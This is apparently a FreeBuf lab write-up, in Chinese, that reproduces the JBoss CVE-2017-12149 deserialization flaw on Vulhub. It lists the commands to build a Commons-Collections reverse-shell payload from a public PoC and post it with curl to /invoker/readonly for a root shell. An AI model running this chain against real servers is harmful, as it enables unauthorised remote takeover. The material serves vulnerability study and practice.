Jboss远程代码执行(CVE-2017-12149 )
Koi
- 关注
收藏一下~
可以收录到专辑噢~
Jboss远程代码执行(CVE-2017-12149 )
一、漏洞原理
该漏洞为 Java反序列化类型,位于 Jboss 的 HttpInvoker 组件中ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。
CVE-2017-12149漏洞影响版本: 5.X 及 6.X
docker-compose.yml情况
version: '2'
services:
jboss:
image: vulhub/jboss:as-6.1.0
ports:
- "9990:9990"
- "8080:8080"
二、实验过程
基于Vulhub平台
靶机Ubuntu搭建docker。IP地址为:192.168.200.47
攻击机Kali。IP地址为:192.168.200.14
启动环境环境,打开靶场网址:IP地址:8080
方法一:使用 jboss CVE-2017-12149工具
github搜索即可开源工具很多
root权限下,执行任意命令
方法二:通过反弹sell获得root权限
1、下载漏洞利用的POC网址
https://github.com/joaomatosf/JavaDeserH2HC
2、编译并生成序列化数据,生成ReverseShellCommonsCollectionsHashMap.class文件(payload文件)
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
3、序列化恶意数据至文件,生成ReverseShellCommonsCollectionsHashMap.ser文件
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP地址:监听端口
4、开启监听8899端口
5、把ReverseShellCommonsCollectionsHashMap.ser发送到靶机
curl http://靶机IP地址:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
6、反弹结果
本文为 Koi 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏

相关推荐
Noob 靶场完整解析
2024-03-23
Al-Web-1.0 靶机 渗透测试
2024-03-20
Vulhub 练习 DC-4靶机完整复现
2024-03-11
文章目录